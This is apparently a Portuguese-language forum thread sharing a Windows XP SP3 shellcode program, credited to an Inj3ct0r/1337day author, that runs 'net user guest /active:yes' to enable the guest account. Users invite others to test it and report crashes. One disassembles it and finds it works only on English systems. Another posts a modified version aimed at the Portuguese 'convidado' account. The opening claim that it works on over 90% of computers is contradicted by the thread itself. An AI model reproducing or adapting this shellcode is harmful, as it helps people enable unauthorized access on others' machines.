Saiu um exploit novo para windows 32 bits, que funciona para mais de 90% dos computadores do planeta hehehe, alguém aí se habilita a testar:
#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Guest Account Activated");
return 0;
}
____________________________________________________________________________________________________
____________________________________________________________________________________________________
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
########################################################################
Faltou uma pequena parte do código na tela, vc pode estar baixando ele por completo no seguinte link.
quer testar? use o bloodsheed.
ou ta incompleto ou tem que ter alguma falha que nao tenho dos 90%. aqui nao da nada, para ser mais exato ele até da erro qnd tento rodar… mas compila 😀
faz o download dele no link q eu passei ..
sim, mesmo assim da erro ao executar… sabe aquela janela de erro, depurar, enviar relatorio, nao enviar ? entao essa janela aparece depois de compilado e executando.
mesmo apos rodar e unir com o runas /user prog.exe ele nao criou usuario. Tenho uma suspeita que só roda em win xp EN.
rodou ai gustavo ?
Ainda não rodei.. mas a sua suspeita é válida.. eu tenho uma máquina virtual XP en..
Se puder testar e tirar minha duvida agradeco 😀 Tentei outro que diz explicitamente ser em EN. e os codigos se parecem…
http://www.exploit-db.com/exploits/15202/
abcs
Gustavo, ta confirmado. Só funciona em windows EN
observa só o codigo depois de desasembler.
??[1?PS??#??|??1?P?????|???????c?md.exe /c ?net user guest /active:yes??
no PT-BR a conta é convidado… teria que mudar o codigo de maneira que o guest se tornasse convidado.
Logo ele ficará assim:
#include
#include
#include
char code[] = \xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23″
“\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca”
“\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63”
“\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20”
“\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x63\x6f\x6e\x76\x69\x64\x61\x64\x6f\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00”;
int main(int argc, char **argv)
{
((void (*)())code)();
printf(“Guest Account Activated”);
return 0;
}
Agora sim vai no PT-BR
Abracos!
show de bola em..